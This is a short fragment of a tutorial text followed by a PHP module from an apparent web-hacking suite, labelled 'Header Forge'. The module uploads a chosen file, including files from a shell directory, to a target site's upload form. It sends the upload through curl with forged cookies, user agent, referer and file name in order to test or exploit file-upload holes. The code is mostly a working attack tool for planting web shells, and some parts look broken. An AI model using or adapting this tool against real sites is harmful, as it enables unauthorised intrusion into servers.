..you how to create native tools. I'm not going to make a new tool though, instead I will show you what is required to create one. You can find all the native tools in the..
Mister LG can create upload forms and test targets on file upload vulnerabilities
<?php
/*
Handler for Header Forge
Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 13-04-2015
*/
set_time_limit(0);
$_MODULE_C = "thc_hf";
include_once("../../Includes/screen_header.php");
include_once($_PATHS['style_root']."/screen.php");
include_once($_PATHS['functions_root']."/scrn.php");
// options
$sOptions = "<b>logging:</b> ".($_CONTEXT['log']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>silence:</b> ".($_CONTEXT['silent']==true ? "on" : "off")."<br>\n";
$sOptions .= "<b>verbose:</b> ".($_CONTEXT['verbose']==true ? "on" : "off")."\n";
if(!function_exists("curl_file_create")){
echo $sOut;
echo"<b id=h7>You need the function curl_file_create (>=PHP 5.5)</b>";
echo $sEnd;
exit;
}
$_CONTEXT['vars'] = array();
if(isset($_POST['sPage'])){
foreach($_POST as $sKey=>$sValue){
$_CONTEXT['vars'][$sKey] = trim($sValue);
}
if(isset($_FILES['sUpload']['tmp_name'])){
// upload file from your own computer
$sData = $_FILES['sUpload']['tmp_name'];
}
else{
// use a file from the shell directory
$sData = ExploitFilter($_PATHS['shell_root']."/".$_POST['sShell'],0,1);
}
if(false==($iSizeFile = @strlen($sData))){
echo $sOut;
echo"<b id=h7>Failed to get file data or no data available</b>";
echo $sEnd;
}
else{
$rConnect = curl_init($_CONTEXT['vars']['sHost'].$_CONTEXT['vars']['sPage']);
$aPost = curl_file_create($sData,$_CONTEXT['vars']['sMedia'],$_CONTEXT['vars']['sFileName']);
$aPost = array($_CONTEXT['vars']['sVarUpload'] => $aPost);
curl_setopt($rConnect,CURLOPT_POST,1);
if(isset($_CONTEXT['vars']['sCookie']) && !empty($_CONTEXT['vars']['sCookie'])){
curl_setopt($rConnect,CURLOPT_COOKIE,$_CONTEXT['vars']['sCookie']);
}
if(isset($_CONTEXT['vars']['sAgent']) && !empty($_CONTEXT['vars']['sAgent'])){
curl_setopt($rConnect,CURLOPT_USERAGENT,$_CONTEXT['vars']['sAgent']);
}
if(isset($_CONTEXT['vars']['sReferer']) && !empty($_CONTEXT['vars']['sReferer'])){
curl_setopt($rConnect,CURLOPT_REFERER,$_CONTEXT['vars']['sReferer']);
}
if(isset($_CONTEXT['vars']['sOtherVar']) && !empty($_CONTEXT['vars']['sOtherVar'])){
$aVars = explode("&",$_CONTEXT['vars']['sOtherVar']);
for($x=0;$x<count($aVars);$x++){
$aVals = @explode("=",$aVars[$x]);
$aPost[$aVals[0]] = $aVals[1];
}
}
curl_setopt($rConnect,CURLOPT_POSTFIELDS,$aPost);
echo $sOut;
$sResult = curl_exec($rConnect);
echo $sEnd;
curl_close($rConnect);
}
}
else{
echo $sOut;
echo $sOptions;
echo $sEnd;
exit;
}
?>